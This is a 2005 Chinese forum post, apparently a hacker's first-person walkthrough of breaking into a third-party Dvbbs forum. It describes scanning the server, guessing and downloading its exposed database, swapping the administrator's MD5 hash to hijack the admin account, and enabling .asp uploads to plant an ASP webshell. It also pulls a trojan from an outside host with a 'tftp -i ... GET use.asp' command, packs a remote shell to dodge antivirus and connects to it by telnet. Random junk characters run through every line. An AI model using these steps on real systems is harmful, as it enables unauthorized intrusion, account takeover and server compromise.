|
编者:文章题目很简单.内容却比题目有趣多了,建议各位看看 : B S+ ?3 v5 w) Z
作者:ALLEN QQ:515659 4 ~2 u/ N/ `$ ?6 O8 P8 }
今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿!
- t' G' ?4 B9 s------------文章开始------------
2 H& V6 o# N- R# e! ]3 m( W/ a为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧 6 L- U3 V. ^' f7 y/ ]- }, n
晕~~~~, * Y& }1 R3 }( {; E6 n
论坛错误信息
+ v! \# \$ A8 b6 q4 o& Z6 |产生错误的可能原因: " x( Q( }9 d* C q( x
您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。
! z5 e9 N! S, ~' Q还要注册阿,可是论坛由于种种原因又不让注册
7 G; e" D- N) m; N+ ^气的我差点吐血!
+ r/ Y3 ?# ~( k V* a1 }$ J怎么办阿???唉,本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了吧,想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口 / R, \8 P" Y0 v: e# N) w S7 @5 G
看来做了端口过滤 ' P; I' v' W/ Q8 X1 Q
没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧 2 `2 h7 {( N- k1 C" E
手动的找了一些,都不行
& d% c+ {, W) N& G我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了 + _& j" \ L6 G% L' A# \
_blank>http://aaa.com/data Q5 q n/ X0 t- N+ R L( _/ l+ y
_blank>http://aaa.com/database
1 m7 [/ p, L! A8 v3 S/ q" `0 p4 }_blank>http://aaa.com/db 1 ?7 O% p; i; a- S8 J
HTTP 错误 404 - 找不到文件
g; s( J4 c4 @ |Internet 信息服务 . e5 E) d8 H& x0 v
继续
$ |& ?' R/ O+ B1 M& r$ P6 x, K_blank>http://aaa.com/mdb 7 F/ o4 | _, p; K7 F9 Z6 O9 k" h% \
HTTP 错误 403 - 禁止访问 5 d+ O; R* c; L! F) g
Internet Explorer
# j' a! X. `+ E2 x0 }2 V" X3 n出现403错误就说明对方有这个目录,但是不允许浏览目录 8 r7 i1 l4 r$ W" S- X: ]
想想看mdb这个目录会是干什么的??哈哈十有八九十存放数据库的目录!
. {& k% s; r8 g1 w" U把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞
6 |" k5 I6 X) \) l5 Y; d: Xscaning.......,大概10分钟过去了
+ B& l5 }; N; G扫描结果
# d% Q, [; a+ T5 }& o" ^% m/mdb/lovemaik.asa [漏洞描述] ; o- _' J6 e1 n
哈哈哈,成功的扫到了数据库,顺便告诉大家一个技巧,
* K! G: t) f' Q8 S- K1 ^把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的!
: t& A# l4 C' a! d/ hxscan有一个好处就是可以直接扫域名,比如_blank>http://www.seeie.com 1 \. ]; G+ y+ K3 q
这样的话xscan就会帮你猜数据库地址
2 G% w0 H- a' a2 E3 U_blank>http://www.seeie.com/mdb/data.asp $ A& D" G, t4 K
_blank>http://www.seeie.com/mdb/db.mdb
) N2 k, s: l% Q2 @# H {$ z! v# u$ y....... ! |/ A2 ?5 w+ S' @7 T
好了,现在打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了 3 C, T0 r6 ?, s# y4 A6 T3 c: ?2 N2 i
在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库并且把数据库扩展名改为.mdb,接着注册用户:allen,密码:123456 6 B' x8 B/ b: K1 r: ~9 U C
现在打开数据库,查看到我们刚才注册的用户allen的密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不能得到明文密码) ) @- u8 i/ V& l0 i$ h. Q
好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字,把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里,好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改管理员的资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些人会问这样做是为什么,原因是动网论坛不允许通过email取回管理员的密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的) 5 ~) H$ ] u* r' T
现在我们拿到了论坛管理员的密码了, % q; F$ ~2 ^/ f( D+ E
注意:以上步骤都是在本地操作的,其目的就是为了拿到论坛管理员密码!
+ c9 K# a# U0 h' |现在登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵
( @" G ?; c9 D7 z* _3 L好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去 , [8 Y3 o6 E7 P
好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去 9 G' N; H6 ~. ^1 l
可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp - a; d6 B3 V6 e
好了,成功了,接这运行木马***.com/bbs/use.asp?id=1
" Z% N2 y* I. P呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把 - S, B6 o0 \3 h+ x/ a# |
靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳吧,这样可以逃过防火墙!
6 t$ E2 m, u7 G6 Y: b1 \继续,传上去并执行。。。。没反应! & |* E9 s; J; m2 K" Y& o
先telnet ip 8210(我喜欢用noika手机的型号做为端口,) | 
IP卡
狗仔卡
发表于 2005-1-23 13:28
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
